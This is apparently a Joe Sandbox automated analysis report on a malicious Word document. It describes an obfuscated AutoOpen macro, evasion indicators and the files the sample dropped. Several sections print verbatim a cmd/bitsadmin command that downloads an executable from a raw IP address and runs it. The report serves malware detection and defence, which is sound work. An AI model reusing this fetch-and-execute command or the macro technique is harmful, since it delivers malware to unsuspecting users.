Analysis Report

Overview

General Information

Joe Sandbox Version:	17.0.0
Analysis ID:	204881
Start time:	17:34:12
Joe Sandbox Product:	Cloud
Start date:	12.01.2017
Overall analysis duration:	0h 5m 29s
Report type:	full
Sample file name:	2e374756930bee59c371d98ff88572a8.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2013 v14, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled VBA Instrumentation enabled
Detection:	MAL
Classification:	mal64.evad.expl.winDOC@7/12@0/0
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
EGA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel document Simulate clicks Found new Word/Excel, stop clicking Number of clicks 70 Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	64	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook

Signature Overview

Click to jump to signature section

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Networking:

Urls found in memory or binary data

Show sources

Source: WINWORD.EXE	String found in binary or memory: file:///c:
Source: WINWORD.EXE	String found in binary or memory: file:///c:/2e374756930bee59c371d98ff88572a8.doc
Source: WINWORD.EXE	String found in binary or memory: file:///c:/2e374756930bee59c371d98ff88572a8.docj-dw
Source: WINWORD.EXE	String found in binary or memory: file:///c:/2e374756930bee59c371d98ff88572a8.docw-dw
Source: WINWORD.EXE	String found in binary or memory: file:///c:/users/sofwilliams/appdata/local/microsoft/office/winword.exe_rules.xml
Source: WINWORD.EXE	String found in binary or memory: file:///c:/users/sofwilliams/appdata/local/microsoft/office/winword.exe_rules.xmlro
Source: MSOSQM.EXE	String found in binary or memory: file:///c:/windows/performance/winsat/datastore/2011-08-17%2009.00.52.786%20formal.assessment%20(rec
Source: MSOSQM.EXE	String found in binary or memory: file://c:
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: http://
Source: bitsadmin.exe	String found in binary or memory: http://93.170.104.98/jbmfkjfre.exe
Source: cmd.exe	String found in binary or memory: http://93.170.104.98/jbmfkjfre.exe%tmp%
Source: bitsadmin.exe	String found in binary or memory: http://93.170.104.98/jbmfkjfre.exec:
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: http://cdn.odc.officeapps.live.com/odc/stat/images/onedriveupsell.png
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: http://cdn.odc.officeapps.live.com/odc/xml?resource=onedrivesignupupsell
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: http://cdn.odc.officeapps.live.com/odc/xml?resource=onedrivesyncclientupsell
Source: WINWORD.EXE	String found in binary or memory: http://cdp1.public-trust.com/crl/omniroot2025.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q
Source: WINWORD.EXE	String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06
Source: WINWORD.EXE	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0)
Source: WINWORD.EXE	String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$
Source: WINWORD.EXE	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0%
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0-
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0/
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com05
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.entrust.net03
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.entrust.net0d
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.msocsp.com0=
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.msocsp.com0n
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: http://odc.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: WINWORD.EXE	String found in binary or memory: http://schema
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: WINWORD.EXE	String found in binary or memory: http://weather.service.msn.com/data.aspx-v2
Source: WINWORD.EXE	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: WINWORD.EXE	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: WINWORD.EXE	String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0
Source: WINWORD.EXE	String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0
Source: WINWORD.EXE	String found in binary or memory: http://www.usertrust.com1
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://api.aadrm.com/
Source: WINWORD.EXE	String found in binary or memory: https://api.aadrm.com/vijk
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: WINWORD.EXE	String found in binary or memory: https://apis.live.net/v5.0/neg&
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://broadcast.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://contacts.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://directory.services.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://excelcs.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://excelps.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: WINWORD.EXE	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediambi_ssl_shortssl.
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://login.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: WINWORD.EXE	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeg
Source: WINWORD.EXE	String found in binary or memory: https://login.windows.net/common/oauth2/authorizev
Source: WINWORD.EXE	String found in binary or memory: https://login.windows.net/common/oauth2/authorizew
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://nexus.
Source: WINWORD.EXE	String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?application=winword.exe&version=15.0.4691.1000&isceip=
Source: WINWORD.EXE	String found in binary or memory: https://nexus.officeapps.live.com;
Source: WINWORD.EXE	String found in binary or memory: https://nexusrules.officeapps.live.com/nexus/rules?application=winword.exe&version=15.0.4691.1000&is
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://ocws.
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://odc.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://officeapps.live.com
Source: WINWORD.EXE	String found in binary or memory: https://officeapps.live.com5
Source: WINWORD.EXE	String found in binary or memory: https://officeapps.live.coma1
Source: WINWORD.EXE	String found in binary or memory: https://officeapps.live.comw
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://ols.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/partnerprovisioning.svc/v1/subscriptions
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/wlx.profiles.ic.json
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://pptcs.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://pptps.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://pptss.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://pptwrs.
Source: 2e374756930bee59c371d98ff88572a8.doc	String found in binary or memory: https://products.office.com/
Source: WINWORD.EXE, 2e374756930bee59c371d98ff88572a8.doc	String found in binary or memory: https://products.office.com/yx
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://profile.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://roaming.
Source: WINWORD.EXE	String found in binary or memory: https://secure.comodo.com/cps0
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://signup.
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://ssl.bing.com/dict/?view=officemoe&ulang=zh-cn&tlang=en-us
Source: WINWORD.EXE	String found in binary or memory: https://ssl.bing.com/dict/?view=officemoe&ulang=zh-cn&tlang=en-us
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://ssl.bing.com/dict/img/bingdict_e2c.png
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://wordcs.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.3696.dr	String found in binary or memory: https://wordps.

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File created: C:\Users\sofwilliams\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5BDD8AA-6045-4FAA-B6AA-F8FE539091F6}.tmp

Found strings which match to known social media urls

Show sources

Source: WINWORD.EXE	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: WINWORD.EXE	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: WINWORD.EXE	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Persistence and Installation Behavior:

May use bcdedit to modify the Windows boot settings

Show sources

Source: cmd.exe

Binary or memory string: Ebcdedit.exe

Tries to download files via bitsadmin

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe C:\Users\SOFWIL~1\AppData\Local\Temp\~.exe

Data Obfuscation:

Document contains an embedded VBA with many randomly named variables

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc

Stream path 'Macros/VBA/NewMacros' : High entropy of concatenated variable names

System Summary:

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\Upgrades

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\15.0\ClickToRun

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File opened: C:\Program Files\Microsoft Office 15\Root\Office15\MSVCR100.dll

Classification label

Show sources

Source: classification engine

Classification label: mal64.evad.expl.winDOC@7/12@0/0

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File created: C:\Users\sofwilliams\AppData\Roaming\Microsoft\Office\Recent\2e374756930bee59c371d98ff88572a8.LNK

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File created: C:\Users\SOFWIL~1\AppData\Local\Temp\CVR97CE.tmp

Document contains an OLE Word Document stream indicating a Microsoft Word file

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc

OLE indicator, Word Document stream: true

Document contains summary information with irregular field values

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc

OLE document summary: title field not present or empty

Found command line output

Show sources

Source: C:\Windows\System32\cmd.exe	Console Write: ........1#........... ..L."...".E..J........1#......@F.J. ..L."...A.....V..J............L."........w........`.....,.....
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ..........................0.................t8...................................e.w.......w..k.....L.......8........;..
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ..............0.....B.I.T.S.A.D.M.I.N. .v.e.r.s.i.o.n. .3...0. .[. .7...5...7.6.0.1. .]...........7.X...H....;......8...
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ..........0.........B.I.T.S. .a.d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .]...........7...7.\...<............-.w
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ....................T.S. .a.d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .]...........7...7...7.....R............r..
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ........................d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .]...........7...7...7.....d...................
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ....................d.m.i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .]...........7...7...7.......7...................\|.
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ....................i.n.i.s.t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .]...........7...7...7.......7......................r..
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ........................t.r.a.t.i.o.n. .u.t.i.l.i.t.y....... .]...........7...7...7.......7.........p................r..
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ....................U.n.a.b.l.e. .t.o. .c.o.n.n.e.c.t. .t.o. .B.I.T.S. .-. .0.x.8.0.0.7.0.4.2.2.........P...`.....,.....
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ................................................................Y..w................'..w.q..h......w........`.....,.....
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ................................................................Y..w................'..w.q..h......w..............,.....
Source: C:\Windows\System32\bitsadmin.exe	Console Write: ................................................................Y..w................'..w.q..h......w........`.....,.....

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE
Source: unknown	Process created: C:\Windows\System32\cmd.exe
Source: unknown	Process created: C:\Windows\System32\bitsadmin.exe
Source: unknown	Process created: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	Process created: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe C:\Users\SOFWIL~1\AppData\Local\Temp\~.exe

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32

Document contains embedded VBA macros

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc

OLE indicator, VBA macros: true

Reads the hosts file

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File read: C:\Windows\System32\drivers\etc\hosts

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AutoOpen			Name: AutoOpen

Document contains an embedded VBA macro which may execute processes

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc	OLE, VBA macro line: Shell nUKaI61f, 0
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AutoOpen, API Shell("cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit",0:Integer)			Name: AutoOpen

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc	OLE, VBA macro line: Set SHswlL = CreateObject("vbscript.regexp")
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function MJCTM, String createobject: Set SHswlL = CreateObject("vbscript.regexp")			Name: MJCTM

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\bitsadmin.exe

System information queried: KernelDebuggerInformation

Malware Analysis System Evasion:

Checks the free space of harddrives

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	File Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE	File Volume queried: C:\Program Files FullSizeInformation
Source: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE	File Volume queried: C:\Windows\System32 FullSizeInformation

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\bitsadmin.exe TID: 3684

Thread sleep time: -60000s >= -60s

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE	Process information set: NOOPENFILEERRORBOX

Document contains OLE streams with high entropy indicating encrypted embedded content

Show sources

Source: 2e374756930bee59c371d98ff88572a8.doc

Stream path 'Data' entropy: 7.9301420367 (max. 8.0)

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\cmd.exe

Queries volume information: C:\ VolumeInformation

Queries time zone information

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias

Behavior Graph

Legend:

Process
Signature
Created File
DNS/IP Info

Yara Overview

No Yara matches

Screenshot

Startup

system is w7_2

WINWORD.EXE (PID: 3696 MD5: FEC5FFC0B51C78D9376A74CD2855D479)

cmd.exe (PID: 1964 cmdline: cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit MD5: AD7B9C14083B52BC532FBA5948342B98)

bitsadmin.exe (PID: 1800 MD5: 0920B14AA67A8B04ACF48FFE7C6F0927)

MSOSQM.EXE (PID: 304 MD5: 04D5CDDFC37410CF388AD731E655E277)

cleanup

Created / dropped Files

File Path	Type and Hashes
C:\Users\sofwilliams\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\office15client.microsoft.com\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20	Type: XML document text MD5: F830CA79C8F36C51339756B2A8139B94 SHA: 722C8CF720E1D28FC189883F0EE891421DC364A9 SHA-256: 0EB9169C22F8E092A0F5126259BFBCB7FBDB565EDD27A78230A6C0D6A6FFFB31 SHA-512: 836E2A0D95A9A71904B954709A3EC6893BF44965B4C78BEC218487E9F027181627E5D97375DE02FEDD5842F2FE1CF1E0C447682EFC89AF613990FB048056BCE0
C:\Users\sofwilliams\AppData\Local\Microsoft\Office\15.0\msosqmcached.dat	Type: data MD5: 6D640794A09FEC118F4EBE5F0CAF0397 SHA: 51632E01FEF30454FA3ACFE120548FEE36543DDC SHA-256: D926CD48738235DFCC813C9BFD86933B93EA22AAD5B5D0747241A936EC7FBD77 SHA-512: 57D7CD4CCD4E755B663D1C3B846B8F4CB8CA62243053FE50A3359A636729871F55C641AD98B29EE5FC6C9B4B49DB7C4116D3A12DB9A65934A60023EEB76A53E7
C:\Users\sofwilliams\AppData\Local\Microsoft\Office\OTeleData_3696_1.etl	Type: MS Windows icon resource MD5: 3C14223E1C96D27E572B59244B130BE3 SHA: A93AE7E2AEE811C3EC06B5C4D95A33F53D1614C2 SHA-256: 98AF76892DDDD743F37BE77F1B2353EC6178036776FD077A967DBF2836FB7CD1 SHA-512: C0BF8AB6E5762EB6706B814052702A2B0D935183754B8ED9D295C0D31AC61C2D13DAC6C189534D83C0CAB37B85222A59001FBF8487079D65997775231ECE6858
C:\Users\sofwilliams\AppData\Local\Microsoft\Office\OTeleData_3696_2.etl	Type: MS Windows icon resource MD5: 6B2A583F0AFBDC728C4080F15AFBFB7D SHA: 1C9E7F173612BA61B95857E6E9983E5806C39E97 SHA-256: 8F300C0B8E583B06938784A0199224BAA04E4271085CCEA86191A984874B94CC SHA-512: B86189ECEAF48D904F919D958576EFF708CCB60FE519C5C6FAFFAD73DDDF88B3B55B3ED434959C3638ACBEB5EAC9DA8BC54EA02B96ADD2E08352716E8A65F222
C:\Users\sofwilliams\AppData\Local\Microsoft\Office\OTele\{179BA4B1-13AD-4614-9BC3-1F51F935EACF} - 3696 - OTele.dat	Type: data MD5: 6E5FB6CAB7C497A24F0B09F3ACF8B637 SHA: DAD94651D26101F91F85A648A9A850AC807BEDBC SHA-256: C76ABDEBA3A09E6AF34B717CFF8D44F597EA43DF4F80EC883569478FEBF273C0 SHA-512: C81A5C8E710F34060690B6DB361D3E0ECE7BB6A7D6E27C8BD13514EA1BDD981FBB4B2784CF837A1779C85204CE27AFBE2DE668220E25A259149D63C986B228FA
C:\Users\sofwilliams\AppData\Local\Microsoft\Office\WINWORD.EXE_Rules.xml	Type: XML document text MD5: 38DDEE12216E26D517920392C8B3CFE8 SHA: 4764473B459ED4332B8AAB7C706C3B40A0866F94 SHA-256: A4F7B5857AE4C24D9F83C7F516AFAEA7791DF31AD155E3A527A935B118FC9818 SHA-512: 250547568B25D33CFFB91617718D94422BF8CEA42E8A237B6535996315D992AA47D6D78684994C90C44EF60CBB8B3ED27091801BBA0685244219253B857F7ED4
C:\Users\sofwilliams\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5BDD8AA-6045-4FAA-B6AA-F8FE539091F6}.tmp	Type: FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375" MD5: 5D4D94EE7E06BBB0AF9584119797B23A SHA: DBB111419C704F116EFA8E72471DD83E86E49677 SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
C:\Users\sofwilliams\AppData\Roaming\Microsoft\Office\Recent\2e374756930bee59c371d98ff88572a8.LNK	Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jul 26 07:26:08 2016, mtime=Tue Jul 26 07:26:08 2016, atime=Thu Jan 12 16:34:18 2017, length=120320, window=hide MD5: 78B84C41914D5D9387CC1D10EEF13209 SHA: 17825C52B240C54E57C76BA00D79CE50EC6A261B SHA-256: A13D023B553C37B56374C0BCC6B4BA52034218B74CE6E8D8CE3432A194826413 SHA-512: 0272F8A85055218CC3DE1E5A0EA57F8CFC223F765F21958B961D4EF9773DBE3762CFCAAF0DF8C280259995EC2012342F970AF2EC01088FCDDEB59EB38CA08287
C:\Users\sofwilliams\AppData\Roaming\Microsoft\Office\Recent\index.dat	Type: ASCII text, with CRLF line terminators MD5: 68C51E55197CF1B2C580F658B988479A SHA: 5BF031F0D0B9274736AE52834C153B4B12B36205 SHA-256: ADF6D4B255A855598048F1B3C9922DB02140674D3608A942BD6F5FD5F711F22B SHA-512: 39179B2E84D9F6738754FA25DCABD0CC609040B20D558B22785752EEA724230C05AB128C139DAAC982F6F3DB3122D3C48412EC4917471746906BB71B82A0DA46
C:\Users\sofwilliams\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	Type: data MD5: 2BF903A3DD633A8DE32B80AE8D37DBB6 SHA: B1193C3CE115C9866BEB9D675BAAB4BF121EF9E3 SHA-256: FED25559A8C18DDA9BEDFFE7A132C364EC2CC138CF3292920F0C65C844ED6B6C SHA-512: A2C7B1FF5A2F30C4E8BF6EF532E84B90474E6FB3DA8FC34570ECA450F96805843B8DEEC819D17DE54D2CEB4E79B5E5D6740FDE8355B11A53D71F81BC622438DC
C:\Users\sofwilliams\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex	Type: Little-endian UTF-16 Unicode text, with no line terminators MD5: F3B25701FE362EC84616A93A45CE9998 SHA: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
